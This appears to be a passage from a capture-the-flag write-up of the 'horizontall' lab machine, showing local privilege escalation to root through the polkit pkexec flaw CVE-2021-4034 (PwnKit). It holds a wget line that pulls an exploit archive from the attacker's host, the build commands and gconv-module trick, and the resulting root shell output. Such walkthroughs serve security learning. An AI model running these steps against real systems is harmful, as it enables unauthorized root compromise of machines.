CVE-2021-4034
peas discovered that the target system is vulnerable to cve-2021-4034
The vulnerable program is a part of Polkit, which manages process privileges. Polkit’s pkexec allows for non-privileged processes to communicate with privileged ones, as well as instrumenting legitimate and authorized uses of privilege escalation similar to sudo.
A memory corruption flaw exists when no argument is passed to the function. By manipulating environment variables, an attacker can trick pkexec to load and execute arbitrary code with superuser privileges.
exploit (pwnkit)
I found an exploit online
Exploitation
strapi@horizontall:/dev/shm$ wget -q http://10.10.14.7/CVE-2021-4034.tar.gz ; tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034Delivery complete
strapi@horizontall:/dev/shm/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true gconv_path=./pwnkit.so:.Local compilation
strapi@horizontall:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
horizontall
# ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.105 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 dead:beef::250:56ff:feb9:8e92 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:8e92 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:8e:92 txqueuelen 1000 (Ethernet)
RX packets 3107740 bytes 597006437 (597.0 MB)
RX errors 0 dropped 167 overruns 0 frame 0
TX packets 3097225 bytes 1408466614 (1.4 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 8881714 bytes 1107158126 (1.1 GB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8881714 bytes 1107158126 (1.1 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0System Level Compromise